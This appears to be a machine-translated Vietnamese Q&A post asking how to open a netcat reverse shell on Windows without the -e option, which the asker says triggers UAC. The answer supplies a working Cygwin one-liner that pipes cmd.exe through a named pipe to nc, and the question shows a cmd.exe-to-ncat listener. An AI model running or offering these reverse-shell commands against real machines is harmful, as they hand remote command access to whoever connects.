Đảo ngược shell bằng netcat trên windows (tùy chọn no -e)

Có cách nào để lấy shell ngược trong Windows bằng netcat mà không cần sử dụng tùy chọn -e vì nó kích hoạt UAC không?

Tôi đã làm cho nó hoạt động từ Linux sang Linux bằng cách sử dụng một đường ống có tên. Tôi muốn đạt được một cái gì đó tương tự trong Windows.

Đang chạy c:\windows\system32\cmd.exe | ncat -l -p 666 trên Windows cho tôi một lời nhắc trong Linux khi tôi kết nối:

# nc 192.168.0.109 666
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\user> dir

^C

Có vẻ như tôi gần gũi, có lẽ thiếu một cái gì đó đơn giản? Nếu chỉ có tên ống trong Windows ...

Tôi không chắc liệu bạn có thể làm điều đó với net32 win32 thuần túy hay không nhưng bạn có thể làm điều đó trong cygwin. Nghe trên 1234 như nc -l 1234 sau đó kết nối với nó trong một cửa sổ riêng biệt bằng lệnh này:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/cygdrive/c/windows/system32/cmd.exe 2>&1|nc 127.0.0.1 1234 >/tmp/f

Lưu ý các phím lên và xuống không hoạt động để chuyển qua lịch sử lệnh bằng phương pháp này.